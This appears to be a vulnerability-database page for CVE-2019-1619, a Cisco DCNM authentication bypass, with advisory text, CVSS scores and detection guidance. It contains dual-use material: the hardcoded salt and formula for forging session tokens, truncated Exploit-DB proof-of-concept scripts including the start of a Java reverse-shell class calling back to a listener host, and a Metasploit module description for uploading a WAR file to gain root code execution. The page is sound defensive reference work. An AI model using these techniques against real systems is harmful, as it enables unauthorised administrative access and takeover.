CVE-2019-1619
published 2019-06-27CVE-2019-1619: A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass…
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
82.82%
99.6th percentile
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | cisco_data_center_network_manager | >= unspecified < 11.1(1) | 11.1(1) |
| cisco | data_center_network_manager | — | — |
| cisco | data_center_network_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
otherMD5('admin' + sessionId + sysTime + 'POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF')↗
- →Alert on unauthenticated POST requests to /fm/fileUpload containing multipart form fields 'fname', 'uploadDir', and a WAR file payload — indicative of CVE-2019-1620 exploitation chained after CVE-2019-1619 auth bypass ↗
- →Detect unauthenticated GET requests to /fm/log/fmlogs.zip — used by attackers (CVE-2019-1622) to retrieve Tomcat/JBoss log paths needed for WAR upload directory targeting ↗
- →Flag HTTP 500 responses from both /fm/pmreport?token=<random> and /fm/fileUpload (GET with no params) as a fingerprinting/check step used by the exploit module ↗
- →Monitor for the hardcoded HMAC salt string 'POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF' appearing in HTTP traffic or process memory — its presence indicates active exploitation of the auth bypass ↗
- →Detect unauthenticated GET requests to /fm/fmrest/about/version — used by the exploit to fingerprint the DCNM version before selecting the appropriate attack path ↗
- ·CVE-2019-1619 auth bypass only affects DCNM versions 10.4(2) and below; version 11.0(1) requires valid credentials for exploitation, and 11.1(1) does not require authentication via a different code path ↗
- ·Version 11.0(1) requires authentication (valid USERNAME/PASSWORD) to exploit; the auth bypass token-forging technique applies only to 10.4(2) and below ↗
- ·The exploit module defaults to SSL/TLS on port 443; detections should also cover non-SSL deployments on alternate ports ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_cisco9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerability
vendor_cisco·2019-06-26·CVSS 9.8
CVE-2019-1619 [CRITICAL] CWE-284 Cisco Data Center Network Manager Authentication Bypass Vulnerability
Cisco Data Center Network Manager Authentication Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.
The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://s
Cisco
Cisco Data Center Network Manager Authentication Bypass Vulnerability
vendor_cisco·CVSS 3.0
CVE-2019-1619 Cisco Data Center Network Manager Authentication Bypass Vulnerability
CVE-2019-1619: Cisco Data Center Network Manager Authentication Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device. Cisco has released software updates that address this vulnerability. There are no
CVSS: 3.0
CWE: CWE-284, CWE-284
Bug IDs: CSCvo64641
GHSA
GHSA-hv79-5q2x-qf8j: A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to b
ghsa_unreviewed·2022-05-24
CVE-2019-1619 [CRITICAL] GHSA-hv79-5q2x-qf8j: A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to b
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.
No detection rules found.
Exploit-DB
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15984 [CRITICAL] Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! tem
Exploit-DB
Cisco Data Center Network Manager 11.2 - Remote Code Execution
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15975 [CRITICAL] Cisco Data Center Network Manager 11.2 - Remote Code Execution
Cisco Data Center Network Manager 11.2 - Remote Code Execution
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100
Notes:
Si.java needs to be compiled against Java 8 (the target used 1.8u201):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Si {
static{
try {
String host = "192.168.100.159";
int port = 1337;
String cmd =
Exploit-DB
Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)
exploitdb·2019-09-03·CVSS 9.8
CVE-2019-1622 [CRITICAL] Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)
Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
'Description' => %q{
DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
directory and achieve remote code execution as root.
This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
directory for the WAR file upload.
This module w
Metasploit
Cisco Data Center Network Manager Unauthenticated Remote Code Execution
metasploit·CVSS 9.8
CVE-2019-1619 [CRITICAL] Cisco Data Center Network Manager Unauthenticated Remote Code Execution
Cisco Data Center Network Manager Unauthenticated Remote Code Execution
DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload. An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps directory and achieve remote code execution as root. This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct directory for the WAR file upload. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).
Metasploit
Cisco Data Center Network Manager Unauthenticated File Download
metasploit
Cisco Data Center Network Manager Unauthenticated File Download
Cisco Data Center Network Manager Unauthenticated File Download
DCNM exposes a servlet to download files on /fm/downloadServlet. An authenticated user can abuse this servlet to download arbitrary files as root by specifying the full path of the file. This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit (see References to understand why).
http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2019/Jul/7http://www.securityfocus.com/bid/108902https://seclists.org/bugtraq/2019/Jul/11https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypasshttp://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2019/Jul/7http://www.securityfocus.com/bid/108902https://seclists.org/bugtraq/2019/Jul/11https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
2019-06-27
Published